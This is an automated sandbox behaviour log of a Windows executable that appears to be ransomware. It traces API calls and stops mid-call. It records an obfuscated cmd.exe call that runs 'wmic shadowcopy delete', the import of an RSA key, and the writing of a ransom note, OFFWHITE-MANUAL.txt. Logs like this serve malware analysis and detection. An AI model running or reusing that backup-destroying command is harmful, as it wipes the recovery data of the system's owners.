# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 04.05.2020 20:21:58.398 Process: id = "1" image_name = "arsdsr.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\arsdsr.exe" page_root = "0x78e82000" os_pid = "0xa18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\arsdsr.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xbcc [0053.156] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\arsdsr.exe\" " [0053.157] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0053.163] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0053.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x759d0000 [0063.669] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0063.669] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\arsdsr.exe\" ", pNumArgs=0x18fd78 | out: pNumArgs=0x18fd78) returned 0x5147a8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\arsdsr.exe" [0063.669] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="ONA MOYA ROZA I YA EE LUBLUUUUUUUU, ONA MOYA DOZA - SEGODNYA ZATYANU") returned 0x74 [0063.670] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0x0) returned 0x0 [0063.670] GetLastError () returned 0x0 [0063.670] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0063.670] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0063.670] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x77550000 [0065.874] CryptStringToBinaryA (in: pszString="BgIAAACkAABSU0ExAAgAAAEAAQCBR9cFY/r7SQ/8sxrQtJohuxgyP8vyQtC86+hnFqsqcMGXyOgv148/5Ns+rFP1KMPxE7eeMwu9cAwzz8leAtCZGbDfHvYeAxj0ictCHGInH7tr7B1/F6FTv7eszSwBnDg1xek/2MM9kP0uLe3BXNPnAsLTc7BsDxWiIKDYPsmREFgjz6RzZTmrD916iqUm2Jxaoi6mxkiQjY1D0prqhjYWokK7PI3ZOH1dDzwBBX+QQyAkq8qyKNRRP0brS85lCJmS5tZBWOtf82dxoF2G3R/v2Tr+8RzsrpCEIVKKkxPrFIkGiN6Ghgwo/1GhiYmEyGfmGDzsHAyMDac0cJbmJVCQ", cchString=0x170, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x18fd5c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x18fd5c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0065.874] GetProcessHeap () returned 0x500000 [0065.874] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x114) returned 0x51b1e8 [0065.874] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0065.874] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0065.874] CryptStringToBinaryA (in: pszString="BgIAAACkAABSU0ExAAgAAAEAAQCBR9cFY/r7SQ/8sxrQtJohuxgyP8vyQtC86+hnFqsqcMGXyOgv148/5Ns+rFP1KMPxE7eeMwu9cAwzz8leAtCZGbDfHvYeAxj0ictCHGInH7tr7B1/F6FTv7eszSwBnDg1xek/2MM9kP0uLe3BXNPnAsLTc7BsDxWiIKDYPsmREFgjz6RzZTmrD916iqUm2Jxaoi6mxkiQjY1D0prqhjYWokK7PI3ZOH1dDzwBBX+QQyAkq8qyKNRRP0brS85lCJmS5tZBWOtf82dxoF2G3R/v2Tr+8RzsrpCEIVKKkxPrFIkGiN6Ghgwo/1GhiYmEyGfmGDzsHAyMDac0cJbmJVCQ", cchString=0x170, dwFlags=0x1, pbBinary=0x51b1e8, pcbBinary=0x18fd5c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x51b1e8, pcbBinary=0x18fd5c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0065.874] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0065.874] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0065.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0065.874] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextA") returned 0x777191dd [0065.875] CryptAcquireContextA (in: phProv=0x405014, szContainer="test", szProvider=0x0, dwProvType=0x1, dwFlags=0x0 | out: phProv=0x405014*=0x0) returned 0 [0066.629] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0066.630] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0066.630] CryptAcquireContextA (in: phProv=0x405014, szContainer="test", szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x405014*=0x51b348) returned 1 [0066.770] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0066.770] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0066.770] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0066.770] CryptImportKey (in: hProv=0x51b348, pbData=0x51b1e8, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x405018 | out: phKey=0x405018*=0x51e880) returned 1 [0066.770] GetProcessHeap () returned 0x500000 [0066.770] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51b1e8 | out: hHeap=0x500000) returned 1 [0066.771] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0066.771] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0066.771] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x759d0000 [0066.771] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0066.773] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\sfadfadSAAFfdsfd\\..\\WindOws\\dfasdfsfdFAfsdfdsa\\..\\SysTem32\\cMD.exe", lpParameters=" /c WmIc ShaDowcoPY delEte", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0082.164] GetLogicalDrives () returned 0x4 [0082.164] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.164] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.164] GetDriveTypeA (lpRootPathName="C:/") returned 0x3 [0082.164] GetProcessHeap () returned 0x500000 [0082.164] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4) returned 0x52bb50 [0082.164] GetProcessHeap () returned 0x500000 [0082.164] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bb70 [0082.165] GetProcessHeap () returned 0x500000 [0082.165] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bb60 [0082.165] lstrcpyW (in: lpString1=0x18fab4, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0082.165] lstrcatW (in: lpString1="C:/", lpString2="OFFWHITE-MANUAL.txt" | out: lpString1="C:/OFFWHITE-MANUAL.txt") returned="C:/OFFWHITE-MANUAL.txt" [0082.165] CreateFileW (lpFileName="C:/OFFWHITE-MANUAL.txt" (normalized: "c:\\offwhite-manual.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0082.171] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.173] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.173] CryptStringToBinaryA (in: pszString="TT7ahAQ/K1m29KRc9NWDN6gWPBud3CigWd3aCM2C689NOAkiO1tBLkYddbk2tZpZa/j15aP/mQNwuapLG0qYM/99my23uYYPgGTI40ujhPfbhEB5gqGDU3iih2PoXXADOH2DiOvBlYesTki6NseQ4cz8JivmAulPqBVSrK5zXTKxLoc9IaCU4fHckToWdBNUe/zihjYR0ce37EAWPevTKbD/HB0YHY8R2XdzJYojN2iNwsoBRn1G0vsH24b21OOJ6PAzskZ79XfJW8fiAUVoJnS4ohoTqW5dW0Hs3QFc79Rt65IqrCYR2go0z0hnqH2x7TNvzFv0wN1ipc0fr4iLN9astWTnLx36sJQcvsW2MKOkgPXCnV5xDh3TG9LteXPMOTluh27zuwRbjIt+hOh86xOIEKFlplnMNQRITgdHX8IMdTun3ESFtLaL5fOqV0ZcUi6Rh7izceeZbuhmMstdI7GRxHp++4UUo1E+lMtTCGyY15/slCtqOBDUu1s7JlqXAGCJhJc5hKmroIk7XzThLJSctDheKrpYEQKi7k6XiHPpE6MstpfD1j5yMU4z5R4Eu6uG0i4LuZ1w3QgF/f18elSsX4uTrBI6JMm7+1AfXulyfO/bg2dSvp1OV/RTCqRzpi84jDXNBfxdk5JgMN9dkfrRJrfGpNbYy9xG4kWfg2tkMv749a6p7akpeh8Y0H/Z57msiDiPb2NZ9opOQcyYyu4cpQIPrQCGD+/1cDrpyGPt1+NAt+GTXD1i6ZOdcD1G34DHY9ZXLbnP7DZuex5jhs9IQYkLLOuWHayePgB2BLQ6PJzmNx/4sP6+vwhqRKdJ/DS/DMBZJ5j9vC91cAek7SNaXUiOCV4XgMKV5aGdFws9uKpfhCKENrPxQ/R7Oj0h5beN4eeijBccXjel7/a/LDCfiJZSztuAXBj5vzAZv46uf69hm98dAVKzqyAoyTIXqpk7SQDS0VKX45+QDlVfC7gyNE7c5hE1nUwcx2cXqMfL/AOrEHMdikvG2vMp3Bz1uFIT1eh9G2gl41HQOrC4K9Xb8mhGriJK6UpK22x6vqCzLq76LekV40ZX4aYOQISM9KhyJ+93xOfxWeoE1+DOE37U2uCTkxWrcfGVNJOjdJxV1StaKkFmp4BNP6WfMgeaeKeBEpzBwmA2FWP23yhxAess/BCzE7kZJomYsezDUmSmT+n1HFJ1EiyA1sq5mewUc92/TpUKr9kkXEED8D4jqsFpDifzneKGacGMLned9huH+XKg9VMoaOGkLTXG1m+H3MLkkaUR3yiyvVfOAthF/jJ/Ku8VetmJAyQ0VJMuNZhk4leF/Z+V77p4QyGJsr5UQkh7eMJMcG4xWySttVlSyJjj+OhnGdh6rxvm5oIXbZlbxQAr9cQH5hZQkbxXQkeQR3mOx/KNU/ZeXQ+nL7MtEAQzZ+uMNkRwLN4+6dLjfTDyJVZwfWLzUw7yJCxKExUfT4smj2rrDdWuLKr+6DmQtUWI27SDnukrtV0+4K4DYcV2Nje9GjxnkXDXl6VM9qlG+NkCpGY9nwip9Eifl7BfhN1Pt0blCdq0QdXm4NCSHdR7DvIyb6LVSJi4Q/hmybVPTKjRBZ1VkSWHyDaAtaIBB9jgQWCSSXrQmjz0Ebe2zWZyBK9MzT17yRwcu9cBFDHnb4ySmcsaqjeolDP+pMfPt1i7GFWYmfUMPYrY7AjaFB0ywx3iqM5zB6KhdC/idLt4TCPP2i8wg1Y6dnr24cNiQnq4UUHYqmNxJyjfMnT3BuqEeWOQHvIRt3JUFS25O6WIxqq0rvFPIwkv8EM5Xiv6FDUMVm9XiyRRItyJm67gyvyhUnvDDv1MKVC9SpxBi0cJo9FCyqAejzdxsDBal9IhcLEFpdsL3A==", cchString=0x760, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x18fcd0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x18fcd0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0082.173] GetProcessHeap () returned 0x500000 [0082.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x586) returned 0x530188 [0082.173] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.173] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.173] CryptStringToBinaryA (in: pszString="TT7ahAQ/K1m29KRc9NWDN6gWPBud3CigWd3aCM2C689NOAkiO1tBLkYddbk2tZpZa/j15aP/mQNwuapLG0qYM/99my23uYYPgGTI40ujhPfbhEB5gqGDU3iih2PoXXADOH2DiOvBlYesTki6NseQ4cz8JivmAulPqBVSrK5zXTKxLoc9IaCU4fHckToWdBNUe/zihjYR0ce37EAWPevTKbD/HB0YHY8R2XdzJYojN2iNwsoBRn1G0vsH24b21OOJ6PAzskZ79XfJW8fiAUVoJnS4ohoTqW5dW0Hs3QFc79Rt65IqrCYR2go0z0hnqH2x7TNvzFv0wN1ipc0fr4iLN9astWTnLx36sJQcvsW2MKOkgPXCnV5xDh3TG9LteXPMOTluh27zuwRbjIt+hOh86xOIEKFlplnMNQRITgdHX8IMdTun3ESFtLaL5fOqV0ZcUi6Rh7izceeZbuhmMstdI7GRxHp++4UUo1E+lMtTCGyY15/slCtqOBDUu1s7JlqXAGCJhJc5hKmroIk7XzThLJSctDheKrpYEQKi7k6XiHPpE6MstpfD1j5yMU4z5R4Eu6uG0i4LuZ1w3QgF/f18elSsX4uTrBI6JMm7+1AfXulyfO/bg2dSvp1OV/RTCqRzpi84jDXNBfxdk5JgMN9dkfrRJrfGpNbYy9xG4kWfg2tkMv749a6p7akpeh8Y0H/Z57msiDiPb2NZ9opOQcyYyu4cpQIPrQCGD+/1cDrpyGPt1+NAt+GTXD1i6ZOdcD1G34DHY9ZXLbnP7DZuex5jhs9IQYkLLOuWHayePgB2BLQ6PJzmNx/4sP6+vwhqRKdJ/DS/DMBZJ5j9vC91cAek7SNaXUiOCV4XgMKV5aGdFws9uKpfhCKENrPxQ/R7Oj0h5beN4eeijBccXjel7/a/LDCfiJZSztuAXBj5vzAZv46uf69hm98dAVKzqyAoyTIXqpk7SQDS0VKX45+QDlVfC7gyNE7c5hE1nUwcx2cXqMfL/AOrEHMdikvG2vMp3Bz1uFIT1eh9G2gl41HQOrC4K9Xb8mhGriJK6UpK22x6vqCzLq76LekV40ZX4aYOQISM9KhyJ+93xOfxWeoE1+DOE37U2uCTkxWrcfGVNJOjdJxV1StaKkFmp4BNP6WfMgeaeKeBEpzBwmA2FWP23yhxAess/BCzE7kZJomYsezDUmSmT+n1HFJ1EiyA1sq5mewUc92/TpUKr9kkXEED8D4jqsFpDifzneKGacGMLned9huH+XKg9VMoaOGkLTXG1m+H3MLkkaUR3yiyvVfOAthF/jJ/Ku8VetmJAyQ0VJMuNZhk4leF/Z+V77p4QyGJsr5UQkh7eMJMcG4xWySttVlSyJjj+OhnGdh6rxvm5oIXbZlbxQAr9cQH5hZQkbxXQkeQR3mOx/KNU/ZeXQ+nL7MtEAQzZ+uMNkRwLN4+6dLjfTDyJVZwfWLzUw7yJCxKExUfT4smj2rrDdWuLKr+6DmQtUWI27SDnukrtV0+4K4DYcV2Nje9GjxnkXDXl6VM9qlG+NkCpGY9nwip9Eifl7BfhN1Pt0blCdq0QdXm4NCSHdR7DvIyb6LVSJi4Q/hmybVPTKjRBZ1VkSWHyDaAtaIBB9jgQWCSSXrQmjz0Ebe2zWZyBK9MzT17yRwcu9cBFDHnb4ySmcsaqjeolDP+pMfPt1i7GFWYmfUMPYrY7AjaFB0ywx3iqM5zB6KhdC/idLt4TCPP2i8wg1Y6dnr24cNiQnq4UUHYqmNxJyjfMnT3BuqEeWOQHvIRt3JUFS25O6WIxqq0rvFPIwkv8EM5Xiv6FDUMVm9XiyRRItyJm67gyvyhUnvDDv1MKVC9SpxBi0cJo9FCyqAejzdxsDBal9IhcLEFpdsL3A==", cchString=0x760, dwFlags=0x1, pbBinary=0x530188, pcbBinary=0x18fcd0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x530188, pcbBinary=0x18fcd0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0082.173] GetProcessHeap () returned 0x500000 [0082.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a6c0 [0082.173] GetProcessHeap () returned 0x500000 [0082.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a690 [0082.173] WriteFile (in: hFile=0x158, lpBuffer=0x530188*, nNumberOfBytesToWrite=0x586, lpNumberOfBytesWritten=0x18fcbc, lpOverlapped=0x0 | out: lpBuffer=0x530188*, lpNumberOfBytesWritten=0x18fcbc*=0x586, lpOverlapped=0x0) returned 1 [0082.175] GetProcessHeap () returned 0x500000 [0082.175] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x530188 | out: hHeap=0x500000) returned 1 [0082.175] GetProcessHeap () returned 0x500000 [0082.175] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52a6c0 | out: hHeap=0x500000) returned 1 [0082.175] GetProcessHeap () returned 0x500000 [0082.175] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52a690 | out: hHeap=0x500000) returned 1 [0082.175] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.175] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x401b1c, lpParameter=0x52bb50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x250 [0082.175] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0xffffffff) returned 0x0 [0154.725] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.725] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.725] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0154.725] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0154.726] GetDesktopWindow () returned 0x10010 [0154.726] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.726] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.726] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0154.726] GetProcAddress (hModule=0x77130000, lpProcName="GetWindowRect") returned 0x77147f34 [0154.726] GetWindowRect (in: hWnd=0x10010, lpRect=0x18fcdc | out: lpRect=0x18fcdc) returned 1 [0154.727] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x18faa0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0154.727] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpString2="\\scam.jpg" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\\\scam.jpg") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\\\scam.jpg" [0154.727] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.727] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.727] CryptStringToBinaryA (in: pszString="TT7ahAQ/K1m29KRc9NWDN6gWPBud3CigWd3aCM2C689NOAkiO1tBLkYddbk2tZpZa/j15aP/mQNwuapLG0qYM/99my23uYYPgGTI40ujhPfbhEB5gqGDU3iih2PoXXADOH2DiOvBlYesTki6NseQ4cz8JivmAulPqBVSrK5zXTKxLoc9IaCU4fHckToWdBNUe/zihjYR0ce37EAWPevTKbD/HB0YHY8R2XdzJYojN2iNwsoBRn1G0vsH24b21OOJ6PAzskZ79XfJW8fiAUVoJnS4ohoTqW5dW0Hs3QFc79Rt65IqrCYR2go0z0hnqH2x7TNvzFv0wN1ipc0fr4iLN9astWTnLx36sJQcvsW2MKOkgPXCnV5xDh3TG9LteXPMOTluh27zuwRbjIt+hOh86xOIEKFlplnMNQRITgdHX8IMdTun3ESFtLaL5fOqV0ZcUi6Rh7izceeZbuhmMstdI7GRxHp++4UUo1E+lMtTCGyY15/slCtqOBDUu1s7JlqXAGCJhJc5hKmroIk7XzThLJSctDheKrpYEQKi7k6XiHPpE6MstpfD1j5yMU4z5R4Eu6uG0i4LuZ1w3QgF/f18elSsX4uTrBI6JMm7+1AfXulyfO/bg2dSvp1OV/RTCqRzpi84jDXNBfxdk5JgMN9dkfrRJrfGpNbYy9xG4kWfg2tkMv749a6p7akpeh8Y0H/Z57msiDiPb2NZ9opOQcyYyu4cpQIPrQCGD+/1cDrpyGPt1+NAt+GTXD1i6ZOdcD1G34DHY9ZXLbnP7DZuex5jhs9IQYkLLOuWHayePgB2BLQ6PJzmNx/4sP6+vwhqRKdJ/DS/DMBZJ5j9vC91cAek7SNaXUiOCV4XgMKV5aGdFws9uKpfhCKENrPxQ/R7Oj0h5beN4eeijBccXjel7/a/LDCfiJZSztuAXBj5vzAZv46uf69hm98dAVKzqyAoyTIXqpk7SQDS0VKX45+QDlVfC7gyNE7c5hE1nUwcx2cXqMfL/AOrEHMdikvG2vMp3Bz1uFIT1eh9G2gl41HQOrC4K9Xb8mhGriJK6UpK22x6vqCzLq76LekV40ZX4aYOQISM9KhyJ+93xOfxWeoE1+DOE37U2uCTkxWrcfGVNJOjdJxV1StaKkFmp4BNP6WfMgeaeKeBEpzBwmA2FWP23yhxAess/BCzE7kZJomYsezDUmSmT+n1HFJ1EiyA1sq5mewUc92/TpUKr9kkXEED8D4jqsFpDifzneKGacGMLned9huH+XKg9VMoaOGkLTXG1m+H3MLkkaUR3yiyvVfOAthF/jJ/Ku8VetmJAyQ0VJMuNZhk4leF/Z+V77p4QyGJsr5UQkh7eMJMcG4xWySttVlSyJjj+OhnGdh6rxvm5oIXbZlbxQAr9cQH5hZQkbxXQkeQR3mOx/KNU/ZeXQ+nL7MtEAQzZ+uMNkRwLN4+6dLjfTDyJVZwfWLzUw7yJCxKExUfT4smj2rrDdWuLKr+6DmQtUWI27SDnukrtV0+4K4DYcV2Nje9GjxnkXDXl6VM9qlG+NkCpGY9nwip9Eifl7BfhN1Pt0blCdq0QdXm4NCSHdR7DvIyb6LVSJi4Q/hmybVPTKjRBZ1VkSWHyDaAtaIBB9jgQWCSSXrQmjz0Ebe2zWZyBK9MzT17yRwcu9cBFDHnb4ySmcsaqjeolDP+pMfPt1i7GFWYmfUMPYrY7AjaFB0ywx3iqM5zB6KhdC/idLt4TCPP2i8wg1Y6dnr24cNiQnq4UUHYqmNxJyjfMnT3BuqEeWOQHvIRt3JUFS25O6WIxqq0rvFPIwkv8EM5Xiv6FDUMVm9XiyRRItyJm67gyvyhUnvDDv1MKVC9SpxBi0cJo9FCyqAejzdxsDBal9IhcLEFpdsL3A==", cchString=0x760, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x18fd50, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x18fd50, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0154.727] GetProcessHeap () returned 0x500000 [0154.727] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x586) returned 0x530188 [0154.727] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.727] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.727] CryptStringToBinaryA (in: pszString="TT7ahAQ/K1m29KRc9NWDN6gWPBud3CigWd3aCM2C689NOAkiO1tBLkYddbk2tZpZa/j15aP/mQNwuapLG0qYM/99my23uYYPgGTI40ujhPfbhEB5gqGDU3iih2PoXXADOH2DiOvBlYesTki6NseQ4cz8JivmAulPqBVSrK5zXTKxLoc9IaCU4fHckToWdBNUe/zihjYR0ce37EAWPevTKbD/HB0YHY8R2XdzJYojN2iNwsoBRn1G0vsH24b21OOJ6PAzskZ79XfJW8fiAUVoJnS4ohoTqW5dW0Hs3QFc79Rt65IqrCYR2go0z0hnqH2x7TNvzFv0wN1ipc0fr4iLN9astWTnLx36sJQcvsW2MKOkgPXCnV5xDh3TG9LteXPMOTluh27zuwRbjIt+hOh86xOIEKFlplnMNQRITgdHX8IMdTun3ESFtLaL5fOqV0ZcUi6Rh7izceeZbuhmMstdI7GRxHp++4UUo1E+lMtTCGyY15/slCtqOBDUu1s7JlqXAGCJhJc5hKmroIk7XzThLJSctDheKrpYEQKi7k6XiHPpE6MstpfD1j5yMU4z5R4Eu6uG0i4LuZ1w3QgF/f18elSsX4uTrBI6JMm7+1AfXulyfO/bg2dSvp1OV/RTCqRzpi84jDXNBfxdk5JgMN9dkfrRJrfGpNbYy9xG4kWfg2tkMv749a6p7akpeh8Y0H/Z57msiDiPb2NZ9opOQcyYyu4cpQIPrQCGD+/1cDrpyGPt1+NAt+GTXD1i6ZOdcD1G34DHY9ZXLbnP7DZuex5jhs9IQYkLLOuWHayePgB2BLQ6PJzmNx/4sP6+vwhqRKdJ/DS/DMBZJ5j9vC91cAek7SNaXUiOCV4XgMKV5aGdFws9uKpfhCKENrPxQ/R7Oj0h5beN4eeijBccXjel7/a/LDCfiJZSztuAXBj5vzAZv46uf69hm98dAVKzqyAoyTIXqpk7SQDS0VKX45+QDlVfC7gyNE7c5hE1nUwcx2cXqMfL/AOrEHMdikvG2vMp3Bz1uFIT1eh9G2gl41HQOrC4K9Xb8mhGriJK6UpK22x6vqCzLq76LekV40ZX4aYOQISM9KhyJ+93xOfxWeoE1+DOE37U2uCTkxWrcfGVNJOjdJxV1StaKkFmp4BNP6WfMgeaeKeBEpzBwmA2FWP23yhxAess/BCzE7kZJomYsezDUmSmT+n1HFJ1EiyA1sq5mewUc92/TpUKr9kkXEED8D4jqsFpDifzneKGacGMLned9huH+XKg9VMoaOGkLTXG1m+H3MLkkaUR3yiyvVfOAthF/jJ/Ku8VetmJAyQ0VJMuNZhk4leF/Z+V77p4QyGJsr5UQkh7eMJMcG4xWySttVlSyJjj+OhnGdh6rxvm5oIXbZlbxQAr9cQH5hZQkbxXQkeQR3mOx/KNU/ZeXQ+nL7MtEAQzZ+uMNkRwLN4+6dLjfTDyJVZwfWLzUw7yJCxKExUfT4smj2rrDdWuLKr+6DmQtUWI27SDnukrtV0+4K4DYcV2Nje9GjxnkXDXl6VM9qlG+NkCpGY9nwip9Eifl7BfhN1Pt0blCdq0QdXm4NCSHdR7DvIyb6LVSJi4Q/hmybVPTKjRBZ1VkSWHyDaAtaIBB9jgQWCSSXrQmjz0Ebe2zWZyBK9MzT17yRwcu9cBFDHnb4ySmcsaqjeolDP+pMfPt1i7GFWYmfUMPYrY7AjaFB0ywx3iqM5zB6KhdC/idLt4TCPP2i8wg1Y6dnr24cNiQnq4UUHYqmNxJyjfMnT3BuqEeWOQHvIRt3JUFS25O6WIxqq0rvFPIwkv8EM5Xiv6FDUMVm9XiyRRItyJm67gyvyhUnvDDv1MKVC9SpxBi0cJo9FCyqAejzdxsDBal9IhcLEFpdsL3A==", cchString=0x760, dwFlags=0x1, pbBinary=0x530188, pcbBinary=0x18fd50, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x530188, pcbBinary=0x18fd50, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0154.728] GetProcessHeap () returned 0x500000 [0154.728] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0154.728] GetProcessHeap () returned 0x500000 [0154.728] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0154.728] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.728] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.728] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0154.728] GetProcAddress (hModule=0x770a0000, lpProcName="CreateFontW") returned 0x770bb600 [0154.729] CreateFontW (cHeight=25, cWidth=0, cEscapement=0, cOrientation=0, cWeight=400, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x2, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Yu Gothic Light") returned 0x2e0a09e1 [0154.730] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.730] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.730] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0154.730] GetProcAddress (hModule=0x77130000, lpProcName="GetDC") returned 0x771472c4 [0154.730] GetDC (hWnd=0x0) returned 0x160109ae [0154.730] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.730] lstrcmpiW 